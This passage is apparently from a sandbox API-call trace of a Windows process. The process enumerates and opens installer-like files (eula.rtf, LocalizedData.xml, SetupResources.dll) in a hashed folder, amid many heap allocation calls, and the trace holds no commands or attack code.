returned 0x420 [0060.230] GetFileType (hFile=0x420) returned 0x1 [0060.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0060.231] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.231] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.231] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.231] CloseHandle (hObject=0x420) returned 1 [0060.231] AreFileApisANSI () returned 1 [0060.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0060.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 36 [0060.231] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.232] GetFileType (hFile=0x420) returned 0x1 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.232] CloseHandle (hObject=0x420) returned 1 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.233] AreFileApisANSI () returned 1 [0060.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0060.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 36 [0060.233] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5)) returned 1 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.233] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0060.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0060.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.234] AreFileApisANSI () returned 1 [0060.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.234] AreFileApisANSI () returned 1 [0060.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0060.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 45 [0060.234] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.235] GetFileType (hFile=0x420) returned 0x1 [0060.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.235] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.236] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.236] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.236] CloseHandle (hObject=0x420) returned 1 [0060.236] AreFileApisANSI () returned 1 [0060.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0060.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 45 [0060.236] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.236] GetFileType (hFile=0x420) returned 0x1 [0060.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.236] CloseHandle (hObject=0x420) returned 1 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.237] AreFileApisANSI () returned 1 [0060.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x716f0 [0060.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 45 [0060.237] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90)) returned 1 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.238] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.238] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.238] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0060.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0060.238] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.238] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.238] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.238] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.239] AreFileApisANSI () returned 1 [0060.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.239] AreFileApisANSI () returned 1 [0060.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0060.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 46 [0060.239] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.240] GetFileType (hFile=0x420) returned 0x1 [0060.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.240] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.240] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.240] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.240] CloseHandle 